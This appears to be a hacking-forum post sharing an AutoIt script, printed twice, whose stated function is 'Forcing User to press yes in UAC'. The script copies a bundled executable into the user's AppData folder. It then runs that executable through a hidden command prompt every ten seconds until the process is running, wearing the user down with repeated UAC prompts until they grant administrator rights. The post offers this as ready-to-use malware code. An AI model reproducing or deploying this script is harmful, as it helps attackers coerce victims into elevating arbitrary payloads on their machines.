11 Years of Service
40%
[HIDE-THANKS]
#cs ----------------------------------------------------------------------------
AutoIt Version: 3.3.14.1
Author/Coder: dead Sand /MR~X [Mohamed Simon]
Script Function:
Forcing User to press yes in UAC
Instructions : - needtoUAC.exe Is the file that Need Administrator Permission
- Put needtoUAC.exe Next To Script To Copy It To Appdata Folder
#ce ----------------------------------------------------------------------------
while 1
FileInstall("needtoUAC.exe", @AppDataDir&"/needtoUAC.exe") ;Copy To appdata
If ProcessExists("needtoUAC.exe") Then ;Check If Process Is Runing
Exit 0 ;Close Script
Else ;Check If Process Isn`t Runing
$Command = "%appdata%/needtoUAC.exe" ;Command Will Execute in cmd
RunWait(@ComSpec & " /c " & $Command , @TempDir, @SW_HIDE) ;using Cmd In hidden Mode
sleep(10000)
EndIf
WEnd
#cs ----------------------------------------------------------------------------
AutoIt Version: 3.3.14.1
Author/Coder: dead Sand /MR~X [Mohamed Simon]
Script Function:
Forcing User to press yes in UAC
Instructions : - needtoUAC.exe Is the file that Need Administrator Permission
- Put needtoUAC.exe Next To Script To Copy It To Appdata Folder
#ce ----------------------------------------------------------------------------
while 1
FileInstall("needtoUAC.exe", @AppDataDir&"/needtoUAC.exe") ;Copy To appdata
If ProcessExists("needtoUAC.exe") Then ;Check If Process Is Runing
Exit 0 ;Close Script
Else ;Check If Process Isn`t Runing
$Command = "%appdata%/needtoUAC.exe" ;Command Will Execute in cmd
RunWait(@ComSpec & " /c " & $Command , @TempDir, @SW_HIDE) ;using Cmd In hidden Mode
sleep(10000)
EndIf
WEnd
Code:
>